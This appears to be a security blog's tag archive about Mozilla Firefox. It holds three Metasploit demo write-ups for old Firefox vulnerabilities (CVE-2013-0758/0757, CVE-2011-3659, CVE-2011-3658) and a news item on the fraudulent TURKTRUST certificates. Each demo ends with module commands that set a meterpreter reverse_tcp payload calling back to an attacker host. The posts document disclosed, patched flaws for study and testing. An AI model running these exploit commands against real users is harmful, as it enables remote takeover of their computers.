Tag Archives: Mozilla

Firefox 17.0.1 + Flash Privileged Code Injection Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Marius Mlynski the 2012-11-21
Vulnerability corrected by vendor the 2013-01-08
Metasploit PoC provided the 2013-05-15

PoC provided by :

Marius Mlynski
joev
sinn3r

Reference(s) :

CVE-2013-0758
CVE-2013-0757
MFSA-2013-15

Affected version(s) :

Firefox 17.0.1 and previous

Tested on Windows 7 SP1 with :

Firefox 17.0.1

Description :

This exploit gains remote code execution on Firefox 17.0.1 and all previous versions, provided the user has installed Flash. No memory corruption is used. First, a Flash object is cloned into the anonymous content of the SVG “use” element in the(CVE-2013-0758). From there, the Flash object can navigate a child frame to a URL in the chrome:// scheme. Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper around the child frame’s window reference and inject code into the chrome:// context. Once we have injection into the chrome execution context, we can write the payload to disk, chmod it (if posix), and then execute. Note: Flash is used here to trigger the exploit but any Firefox plugin with script access should be able to trigger it.

Commands :

use exploit/multi/browser/firefox_svg_plugin
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo

Fraudulent TURKTRUST Digital Certificat Used In Active Attacks

GoogleMicrosoft and Mozilla have release alerts regarding active attacks using fraudulent digital certificates issued by TURKTRUST, a Turkish certificate authority and a subsidiary company of Turkish Armed Forces ELELE Foundation Company.

Google alert precise that on 24 December they detected and blocked an unauthorized digital certificate for the “*.google.com” domain. This certificat was issued by an intermediate certificate authority (CA) linked to TURKTRUST. After investigation, in collaboration with TURKTRUST, it appears that an additional intermediate certificate authority was also compromised. Google Chrome certificate revocation list has been updated the 26 December to block these fraudulent intermediate CA.

Microsoft has release an Security Advisory MSA-2798897, who affects all supported releases of Microsoft Windows. Microsoft is updating the Certificate Trust list and provide an update for all supported releases of Microsoft Windows that removes these fraudulent certificates. Systems using Windows 8, Windows RT, Windows Server 2012, and devices running Windows Phone 8 are automatically updated and protected.

The following certificates will be added to the Untrusted Certificates folder:

  • Certificate “*.google.com” issued by “*.EGO.GOV.TR” with thumbprint “4d 85 47 b7 f8 64 13 2a 7f 62 d9 b7 5b 06 85 21 f1 0b 68 e3“.
  • Certificate “e-islem.kktcmerkezbankasi.org” issued by “TURKTRUST Elektronik Sunucu Sertifikasi Hizmetleri” with thumbprint “f9 2b e5 26 6c c0 5d b2 dc 0d c3 f2 dc 74 e0 2d ef d9 49 cb“.
  • Certificate “*.EGO.GOV.TR” issued by “TURKTRUST Elektronik Sunucu Sertifikasi Hizmetleri” with thumbprint “c6 9f 28 c8 25 13 9e 65 a6 46 c4 34 ac a5 a1 d2 00 29 5d b1“.

Mozilla has release a Security Blog Post and take a different position than Google or Microsoft. The foundation will actively revoke trust for the two fraudulent certificates, but also suspend inclusion of the “TÜRKTRUST Bilgi ?leti?im ve Bili?im Güvenli?i Hizmetleri A.?. (c) Aral?k 2007” root certificate, pending further review. A new release of Firefox will be released on Tuesday 8th January.

These fraudulent certificate could be used to spoof content, perform phishing attacks, or perform man-in-the-middle attacks, so we advise you to update asap.

CVE-2011-3659 Firefox 8/9 AttributeChildRemoved() Use-After-Free Metasploit Demo

Timeline :

Vulnerability discovered by regenrecht
Vulnerability reported by regenrecht to ZDI
Vulnerability reported to the vendor by ZDI the 2011-12-06
Coordinated public release of the vulnerability the 2011-12-20
Metasploit PoC provided the 2012-05-07

PoC provided by :

regenrecht
Lincoln
corelanc0d3r

Reference(s) :

CVE-2011-3659
OSVDB-78736
MFSA-2012-04

Affected version(s) :

Mozilla Firefox before version 10.0
Mozilla Firefox before version 3.6.26
Mozilla Thunderbird before version 10.0
Mozilla Thunderbird before version 3.1.18
Mozilla SeaMonkey before version 2.7

Tested on Windows XP Pro SP3 with :

Mozilla Firefox version 9.0.1

Description :

This metasploit module is quiet unstable and exploitation is random.

This module exploits a use-after-free vulnerability in Firefox 8/8.0.1 and 9/9.0.1. Removal of child nodes from the nsDOMAttribute can allow for a child to still be accessible after removal due to a premature notification of AttributeChildRemoved. Since mFirstChild is not set to NULL until after this call is made, this means the removed child will be accessible after it has been removed. By carefully manipulating the memory layout, this can lead to arbitrary code execution.

Commands :

use exploit/windows/browser/mozilla_attribchildremoved
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo

CVE-2011-3658 Firefox 7/8 nsSVGValue Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered by regenrecht
Vulnerability reported by regenrecht to ZDI
Vulnerability reported to the vendor by ZDI the 2011-12-01
Coordinated public release of the vulnerability the 2011-12-20
Metasploit PoC provided the 2012-05-07

PoC provided by :

regenrecht
Lincoln
corelanc0d3r

Reference(s) :

CVE-2011-3658
OSVDB-77953
MFSA-2011-55

Affected version(s) :

Mozilla Firefox before version 9.0
Mozilla Firefox before version 3.6.28
Mozilla Thunderbird before version 9.0
Mozilla SeaMonkey before version 2.6

Tested on Windows XP Pro SP3 with :

Mozilla Firefox before version 7.0.1

Description :

This metasploit module is quiet unstable and exploitation is random.

This module exploits an out-of-bounds access flaw in Firefox 7 and 8. The notification of nsSVGValue observers via nsSVGValue::NotifyObservers(x,y) uses a loop which can result in an out-of-bounds access to attacker-controlled memory. The mObserver ElementAt() function (which picks up pointers), does not validate if a given index is out of bound. If a custom observer of nsSVGValue is created, which removes elements from the original observer, and memory layout is manipulated properly, the ElementAt() function might pick up an attacker provided pointer, which can be leveraged to gain remote arbitrary code execution.

Commands :

use exploit/windows/browser/mozilla_nssvgvalue
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo